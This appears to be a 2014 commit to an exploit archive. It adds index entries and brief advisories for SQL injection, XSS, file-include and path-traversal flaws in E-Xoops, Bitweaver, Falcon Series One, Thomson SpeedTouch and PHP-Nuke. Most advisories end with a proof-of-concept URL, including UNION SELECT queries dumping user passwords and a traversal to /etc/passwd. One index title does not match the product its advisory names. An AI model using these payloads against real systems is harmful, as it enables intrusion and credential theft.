Updated 01_14_2014

files.csv

@@ -27697,3 +27697,12 @@ id,file,description,date,author,platform,type,port
 30862,platforms/php/webapps/30862.txt,"E-Xoops 1.0.5/1.0.8 adresses/ratefile.php lid Parameter SQL Injection",2007-12-10,Lostmon,php,webapps,0
 30863,platforms/php/webapps/30863.txt,"E-Xoops 1.0.5/1.0.8 mydownloads/ratefile.php lid Parameter SQL Injection",2007-12-10,Lostmon,php,webapps,0
 30864,platforms/php/webapps/30864.txt,"E-Xoops 1.0.5/1.0.8 mysections/ratefile.php lid Parameter SQL Injection",2007-12-10,Lostmon,php,webapps,0
+30873,platforms/php/webapps/30873.txt,"E-Xoops 1.0.5/1.0.8 myalbum/ratephoto.php lid Parameter SQL Injection",2007-12-10,Lostmon,php,webapps,0
+30874,platforms/php/webapps/30874.txt,"E-Xoops 1.0.5/1.0.8 modules/banners/click.php bid Parameter SQL Injection",2007-12-10,Lostmon,php,webapps,0
+30875,platforms/php/webapps/30875.txt,"E-Xoops 1.0.5/1.0.8 modules/arcade/index.php gid Parameter SQL Injection",2007-12-10,Lostmon,php,webapps,0
+30876,platforms/php/webapps/30876.txt,"Falcon Series One 1.4.3 stable Multiple Input Validation Vulnerabilities",2007-11-10,MhZ91,php,webapps,0
+30878,platforms/php/webapps/30878.txt,"Bitweaver 1.x/2.0 users/register.php URL XSS",2007-11-10,Doz,php,webapps,0
+30879,platforms/php/webapps/30879.txt,"Bitweaver 1.x/2.0 search/index.php URL XSS",2007-11-10,Doz,php,webapps,0
+30880,platforms/php/webapps/30880.txt,"Bitweaver 1.x/2.0 search/index.php highlight Parameter SQL Injection",2007-11-10,Doz,php,webapps,0
+30881,platforms/php/webapps/30881.txt,"PHP-Nuke 8.0 autohtml.php Local File Include Vulnerability",2007-11-10,d3v1l,php,webapps,0
+30882,platforms/hardware/remote/30882.txt,"Thomson SpeedTouch 716 URL Parameter Cross-Site Scripting Vulnerability",2007-11-10,"Remco Verhoef",hardware,remote,0

platforms/hardware/remote/30882.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/26808/info
+
+Thomson SpeedTouch 716 is prone to a cross-site scripting vulnerability because the device fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+This issue affects Thomson SpeedTouch 716 firmware 6.2.17.50 and 5.4.0.14; other versions may also be affected. 
+
+http://www.example.com/cgi/b/ic/connect/?nm=1&client=192.168.1.72&server=&event=ServerTimeout&url=<script>alert('bla');</script> 

platforms/php/webapps/30873.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/26796/info
+    
+E-Xoops is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+    
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+   
+http://www.example.com/e-xoops/modules/myalbum/ratephoto.php?lid=-1%20UNION%20SELECT%20pass%20FROM%20e_xoops_users%20LIMIT%201

platforms/php/webapps/30874.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/26796/info
+     
+E-Xoops is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+     
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+    
+http://www.example.com/e-xoops/modules/banners/click.php?bid=-1%20UNION%20SELECT%20pass%20FROM%20e_xoops_users%20LIMIT%201

platforms/php/webapps/30875.txt

@@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/26796/info
+      
+E-Xoops is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+      
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+     
+http://www.example.com/e-xoops/modules/arcade/index.php?act=show_stats&gid=-1%20UNION%20SELECT%20pass%20FROM%20e_xoops_users%20LIMIT%201 
+http://www.example.com/e-xoops/modules/arcade/index.php?act=play_game&gid=-1%20UNION%20SELECT%20pass%20FROM%20e_xoops_users%20LIMIT%201 

platforms/php/webapps/30876.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/26798/info
+
+Falcon Series One is prone to multiple input-validation vulnerabilities because it fails to properly sanitize user-supplied input. These issues include a remote file-include vulnerability and multiple HTML-injection vulnerabilities.
+
+Exploiting these issues can allow attacker-supplied HTML or script code to run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible.
+
+Falcon Series One 1.4.3 stable is vulnerable; other versions may also be affected. 
+
+http://www.example.com/sitemap.xml.php?dir[classes]=[Evil_Code] 

platforms/php/webapps/30878.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/26801/info
+
+Bitweaver is prone to multiple input-validation vulnerabilities because the application fails to sufficiently sanitize user-supplied input including multiple cross-site scripting vulnerabilities, multiple HTML-injection vulnerabilities, and an SQL-injection vulnerability.
+
+A successful exploit of these vulnerabilities could allow an attacker to compromise the application, access or modify data, steal cookie-based authentication credentials, or exploit vulnerabilities in the underlying database. Other attacks are also possible.
+
+Bitweaver 2.0.0 and prior versions are vulnerable to these issues.
+
+
+http://www.example.com/users/register.php/XSS

platforms/php/webapps/30879.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/26801/info
+ 
+Bitweaver is prone to multiple input-validation vulnerabilities because the application fails to sufficiently sanitize user-supplied input including multiple cross-site scripting vulnerabilities, multiple HTML-injection vulnerabilities, and an SQL-injection vulnerability.
+ 
+A successful exploit of these vulnerabilities could allow an attacker to compromise the application, access or modify data, steal cookie-based authentication credentials, or exploit vulnerabilities in the underlying database. Other attacks are also possible.
+ 
+Bitweaver 2.0.0 and prior versions are vulnerable to these issues.
+
+http://www.example.com/search/index.php/XSS

platforms/php/webapps/30880.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/26801/info
+  
+Bitweaver is prone to multiple input-validation vulnerabilities because the application fails to sufficiently sanitize user-supplied input including multiple cross-site scripting vulnerabilities, multiple HTML-injection vulnerabilities, and an SQL-injection vulnerability.
+  
+A successful exploit of these vulnerabilities could allow an attacker to compromise the application, access or modify data, steal cookie-based authentication credentials, or exploit vulnerabilities in the underlying database. Other attacks are also possible.
+  
+Bitweaver 2.0.0 and prior versions are vulnerable to these issues.
+
+http://www.example.com/search/index.php?tk=316dccdfb62a3cad613e&highlight=[SQL_INJECTION]=&search=go 

platforms/php/webapps/30881.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/26807/info
+
+Dance Music is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+Exploiting this issue may allow an unauthorized remote user to view files and execute local scripts in the context of the webserver process. 
+
+http://www.example.com/autohtml.php?filename=../../../../../../../../../../../../../../../etc/passwd